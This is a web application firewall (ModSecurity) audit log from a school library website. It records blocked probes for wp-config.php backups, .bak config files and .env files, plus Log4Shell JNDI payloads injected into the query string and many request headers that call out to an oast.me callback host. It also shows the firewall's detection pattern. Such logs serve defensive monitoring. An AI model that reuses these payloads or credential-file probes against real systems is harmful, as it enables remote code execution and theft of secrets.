Content-Type: text/html; charset=iso-8859-1 --b5a9cb7c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748993269828719 760 (- - -) Stopwatch2: 1748993269828719 760; combined=357, p1=317, p2=0, p3=0, p4=0, p5=40, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5a9cb7c-Z-- --56342a29-A-- [04/Jun/2025:06:27:51 +0700] aD-E99hPZJx8OfNaLCow8wAAAM0 103.236.140.4 44838 103.236.140.4 8181 --56342a29-B-- GET /.wp-config.php.swo HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 171315470 --56342a29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --56342a29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748993271267882 683 (- - -) Stopwatch2: 1748993271267882 683; combined=249, p1=223, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56342a29-Z-- --6b299550-A-- [04/Jun/2025:06:27:53 +0700] aD-E-dhPZJx8OfNaLCow9AAAAM8 103.236.140.4 44842 103.236.140.4 8181 --6b299550-B-- GET /.wp-config.php.swp HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172786359 --6b299550-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6b299550-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748993273831596 737 (- - -) Stopwatch2: 1748993273831596 737; combined=338, p1=305, p2=0, p3=0, p4=0, p5=33, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b299550-Z-- --8be4612e-A-- [04/Jun/2025:06:34:20 +0700] aD-GfDNXNn6zAsHj7JAXjwAAAFI 103.236.140.4 45142 103.236.140.4 8181 --8be4612e-B-- GET /404.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 171315659 --8be4612e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8be4612e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748993660725185 2534 (- - -) Stopwatch2: 1748993660725185 2534; combined=937, p1=501, p2=407, p3=0, p4=0, p5=29, sr=155, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8be4612e-Z-- --c3d45f20-A-- [04/Jun/2025:06:57:42 +0700] aD-L9l_DvM40jZomokt_CQAAABg 103.236.140.4 46178 103.236.140.4 8181 --c3d45f20-B-- GET /admin/config.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172787181 --c3d45f20-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c3d45f20-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748995062333927 1757 (- - -) Stopwatch2: 1748995062333927 1757; combined=601, p1=339, p2=236, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3d45f20-Z-- --d16e0a61-A-- [04/Jun/2025:06:57:54 +0700] aD-MAl_DvM40jZomokt_DQAAAAU 103.236.140.4 46188 103.236.140.4 8181 --d16e0a61-B-- GET /admin/configuration.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 173092320 --d16e0a61-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d16e0a61-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748995074730123 2538 (- - -) Stopwatch2: 1748995074730123 2538; combined=787, p1=459, p2=297, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d16e0a61-Z-- --d59b9f46-A-- [04/Jun/2025:06:58:51 +0700] aD-MO1_DvM40jZomokt_HAAAAAY 103.236.140.4 46228 103.236.140.4 8181 --d59b9f46-B-- GET /admin/database.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172787208 --d59b9f46-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d59b9f46-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748995131552988 2131 (- - -) Stopwatch2: 1748995131552988 2131; combined=674, p1=385, p2=262, p3=0, p4=0, p5=26, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d59b9f46-Z-- --d7586f79-A-- [04/Jun/2025:07:05:53 +0700] aD-N4V_DvM40jZomokt_ZgAAABg 103.236.140.4 46504 103.236.140.4 8181 --d7586f79-B-- GET /admin/setup.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172787361 --d7586f79-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d7586f79-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748995553281039 1784 (- - -) Stopwatch2: 1748995553281039 1784; combined=661, p1=344, p2=291, p3=0, p4=0, p5=26, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7586f79-Z-- --e7d3a61f-A-- [04/Jun/2025:07:07:41 +0700] aD-OTZLmnxTwEPX7IubPYgAAAJI 103.236.140.4 46578 103.236.140.4 8181 --e7d3a61f-B-- GET /admin/wp-config.php_old2017 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 173092542 --e7d3a61f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e7d3a61f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748995661040313 720 (- - -) Stopwatch2: 1748995661040313 720; combined=261, p1=234, p2=0, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7d3a61f-Z-- --52d2d22f-A-- [04/Jun/2025:07:28:15 +0700] aD-TH9hPZJx8OfNaLCoyMgAAAMA 103.236.140.4 47578 103.236.140.4 8181 --52d2d22f-B-- GET /?x=${jndi:ldap://${:-779}${:-651}.${hostName}.uri.d0us2vpgpeonc6qdbef0cce4nhsgm9zqd.oast.me/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 172788047 --52d2d22f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52d2d22f-E-- --52d2d22f-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748996895692104 3825 (- - -) Stopwatch2: 1748996895692104 3825; combined=2823, p1=325, p2=2460, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52d2d22f-Z-- --a9677627-A-- [04/Jun/2025:07:28:19 +0700] aD-TI9hPZJx8OfNaLCoyNQAAAMQ 103.236.140.4 47578 103.236.140.4 8181 --a9677627-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-779}${:-651}.${hostName}.referer.d0us2vpgpeonc6qdbef0793c7w15uaadc.oast.me} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: ${jndi:ldap://${:-779}${:-651}.${hostName}.useragent.d0us2vpgpeonc6qdbef03qjb3d7fyuc8q.oast.me} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-779}${:-651}.${hostName}.accept.d0us2vpgpeonc6qdbef0hahymar4qjipf.oast.me} Accept-Language: ${jndi:ldap://${:-779}${:-651}.${hostName}.acceptlanguage.d0us2vpgpeonc6qdbef069s74m97eihd1.oast.me} Access-Control-Request-Headers: ${jndi:ldap://${:-779}${:-651}.${hostName}.accesscontrolrequestheaders.d0us2vpgpeonc6qdbef0uqzoefeey7aou.oast.me} Access-Control-Request-Method: ${jndi:ldap://${:-779}${:-651}.${hostName}.accesscontrolrequestmethod.d0us2vpgpeonc6qdbef0p6z5hbeq4h3tx.oast.me} Authentication: Bearer ${jndi:ldap://${:-779}${:-651}.${hostName}.authenticationbearer.d0us2vpgpeonc6qdbef0mruziyefzzam9.oast.me} Location: ${jndi:ldap://${:-779}${:-651}.${hostName}.location.d0us2vpgpeonc6qdbef0tm7hhcxgkqzam.oast.me} Origin: ${jndi:ldap://${:-779}${:-651}.${hostName}.origin.d0us2vpgpeonc6qdbef0eacrbgjdq8hrf.oast.me} Upgrade-Insecure-Requests: ${jndi:ldap://${:-779}${:-651}.${hostName}.upgradeinsecurerequests.d0us2vpgpeonc6qdbef0h6nsinpkwh1it.oast.me} X-Api-Version: ${jndi:ldap://${:-779}${:-651}.${hostName}.xapiversion.d0us2vpgpeonc6qdbef0n6ok5cn1bzcko.oast.me} X-CSRF-Token: ${jndi:ldap://${:-779}${:-651}.${hostName}.xcsrftoken.d0us2vpgpeonc6qdbef08wf59yr4gho7x.oast.me} X-Druid-Comment: ${jndi:ldap://${:-779}${:-651}.${hostName}.xdruidcomment.d0us2vpgpeonc6qdbef0eh6jjd65mxy4d.oast.me} X-Origin: ${jndi:ldap://${:-779}${:-651}.${hostName}.xorigin.d0us2vpgpeonc6qdbef0pzpqgk4wi5nni.oast.me} Cookie: ${jndi:ldap://${:-779}${:-651}.${hostName}.cookiename.d0us2vpgpeonc6qdbef0a9jyd41sxjq3e.oast.me}=${jndi:ldap://${:-779}${:-651}.${hostName}.cookievalue.d0us2vpgpeonc6qdbef08mhbf3g9ntnox.oast.me} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173093114 --a9677627-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a9677627-E-- --a9677627-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748996899685912 5469 (- - -) Stopwatch2: 1748996899685912 5469; combined=3745, p1=469, p2=3247, p3=0, p4=0, p5=29, sr=101, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9677627-Z-- --2bf2e34d-A-- [04/Jun/2025:08:02:23 +0700] aD-bHzNXNn6zAsHj7JAYBwAAAFE 103.236.140.4 48588 103.236.140.4 8181 --2bf2e34d-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.53.160.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.53.160.111 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --2bf2e34d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bf2e34d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748998943291818 857 (- - -) Stopwatch2: 1748998943291818 857; combined=320, p1=283, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bf2e34d-Z-- --1fdc606e-A-- [04/Jun/2025:08:18:52 +0700] aD-e_F_DvM40jZomokuBbAAAABA 103.236.140.4 48658 103.236.140.4 8181 --1fdc606e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 Accept-Charset: utf-8 --1fdc606e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fdc606e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748999932380545 801 (- - -) Stopwatch2: 1748999932380545 801; combined=379, p1=339, p2=0, p3=0, p4=0, p5=40, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fdc606e-Z-- --bb8f7660-A-- [04/Jun/2025:08:29:05 +0700] aD-hYV_DvM40jZomokuBbwAAABg 103.236.140.4 48678 103.236.140.4 8181 --bb8f7660-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.57 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.57 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --bb8f7660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb8f7660-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749000545840158 886 (- - -) Stopwatch2: 1749000545840158 886; combined=392, p1=346, p2=0, p3=0, p4=0, p5=46, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb8f7660-Z-- --0292da7f-A-- [04/Jun/2025:08:29:10 +0700] aD-hZl_DvM40jZomokuBcAAAAAI 103.236.140.4 48680 103.236.140.4 8181 --0292da7f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.57 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.57 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0292da7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0292da7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749000550437068 797 (- - -) Stopwatch2: 1749000550437068 797; combined=346, p1=305, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0292da7f-Z-- --835ed955-A-- [04/Jun/2025:09:03:45 +0700] aD-pgZLmnxTwEPX7IubP4wAAAIY 103.236.140.4 49076 103.236.140.4 8181 --835ed955-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --835ed955-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --835ed955-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749002625712334 860 (- - -) Stopwatch2: 1749002625712334 860; combined=363, p1=328, p2=0, p3=0, p4=0, p5=35, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --835ed955-Z-- --254d4943-A-- [04/Jun/2025:09:56:47 +0700] aD-17zNXNn6zAsHj7JAYTAAAAFI 103.236.140.4 49422 103.236.140.4 8181 --254d4943-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.159 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --254d4943-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --254d4943-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749005807761247 827 (- - -) Stopwatch2: 1749005807761247 827; combined=330, p1=288, p2=0, p3=0, p4=0, 